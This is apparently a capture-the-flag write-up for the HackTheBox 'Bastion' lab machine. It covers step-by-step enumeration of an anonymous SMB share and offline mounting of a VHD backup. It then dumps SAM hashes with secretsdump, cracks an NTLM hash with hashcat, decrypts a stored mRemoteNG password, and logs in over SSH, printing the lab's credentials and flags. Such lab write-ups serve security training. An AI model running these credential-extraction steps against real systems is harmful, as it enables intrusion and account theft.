HackTheBox Bastion
Writeup for HackTheBox Bastion
Machine Synopsis
Bastion is an Easy level WIndows box which contains a VHD ( Virtual Hard Disk ) image from which credentials can be extracted. After logging in, the software MRemoteNG is found to be installed which stores passwords insecurely, and from which credentials can be extracted. (Source)
Key exploitation techniques:
- SMB share enumeration and VHD image retrieval
- Offline hash extraction from VHD (SAM/SYSTEM/SECURITY hives)
- NTLM hash cracking
- SSH for initial user access
mRemoteNGpassword decryption from configuration file- SSH for Administrator access
Enumeration
1
2
3
4
5
6
7
8
9
10
11
❯ nmap -sC -sV -A 10.10.10.134
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
The scan identified SSH and SMB services on a Windows Server 2016 machine. smbclient was used to list accessible shares.
1
2
3
4
5
6
7
8
9
❯ smbclient -L \\\\10.10.10.134\\
Password for [WORKGROUP\shiro]: <no password>
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
The Backups share was accessible anonymously. Browsing its contents revealed a note.txt and a WindowsImageBackup directory containing VHD files.
1
2
3
4
❯ smbclient \\\\10.10.10.134\\Backups
smb: \> ls
note.txt AR 116 Tue Apr 16 18:10:09 2019
WindowsImageBackup Dn 0 Fri Feb 22 20:44:02 2019
note.txt contained a hint about not transferring the entire backup file locally due to slow VPN.
1
2
> cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
The WindowsImageBackup directory contained a subdirectory (e.g., L4mpje-PC/Backup 2019-02-22 124351/) with VHD files (.vhd).
Exploitation
Offline Hash Extraction (L4mpje)
The SMB Backups share was mounted locally using cifs.
1
2
3
❯ sudo mkdir -p /mnt/smb
❯ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb
Password for root@//10.10.10.134/Backups: <no password>
The VHD was mounted at /mnt/vhd.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup ❯ ls
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
libguestfs-tools was installed, and guestmount was used to mount the VHD file (9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd) from the mounted SMB share.
1
2
3
❯ sudo apt install libguestfs-tools
❯ sudo mkdir -p /mnt/vhd
❯ sudo guestmount --add '/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd' --inspector --ro /mnt/vhd
The SAM, SYSTEM, and SECURITY registry hives were located in /mnt/vhd/Windows/System32/config.
1
2
3
4
5
6
❯ ls /mnt/vhd/Windows/System32/config
...
SAM
SECURITY
SYSTEM
...
impacket-secretsdump was used with these hives to dump local NTLM hashes.
1
2
3
4
5
6
7
8
9
❯ impacket-secretsdump -sam /mnt/vhd/Windows/System32/config/SAM -system /mnt/vhd/Windows/System32/config/SYSTEM -security /mnt/vhd/Windows/System32/config/SECURITY LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
...
The NTLM hash for L4mpje (26112010952d963c8dc4217daec986d9) was extracted and cracked using hashcat (mode 1000) with rockyou.txt.
1
2
3
❯ hashcat -m 1000 '26112010952d963c8dc4217daec986d9' /usr/share/wordlists/rockyou.txt
...
26112010952d963c8dc4217daec986d9:bureaulampje
The password for L4mpje was bureaulampje. SSH access was gained using these credentials.
1
2
3
4
5
6
❯ ssh L4mpje@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>type Desktop\user.txt
b6230043379272f4b71f11740da4886e
The user.txt flag was retrieved.
Privilege Escalation
mRemoteNG Password Decryption (Administrator)
Enumeration of L4mpje’s AppData\Roaming directory revealed an mRemoteNG folder containing confCons.xml.
1
2
3
4
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
...
22-02-2019 14:03 6.316 confCons.xml
...
confCons.xml contained an encrypted password for the Administrator user.
1
2
3
4
5
6
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" ... Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ...>
<Node Name="DC" Type="Connection" ... Username="Administrator" ... Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" ... />
...
</mrng:Connections>
The encrypted password aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== was extracted. A public tool mRemoteNG-Decrypt was used to decrypt it.
1
2
3
4
❯ git clone https://github.com/haseebT/mRemoteNG-Decrypt
❯ cd mRemoteNG-Decrypt
❯ python3 mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
Password: thXLHM96BeKL0ER2
The decrypted password for Administrator was thXLHM96BeKL0ER2. SSH access was gained as Administrator.
1
2
3
4
5
6
❯ ssh Administrator@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
9afa7bdc0dae4a62bb28217bebe7053b
The root.txt flag was retrieved.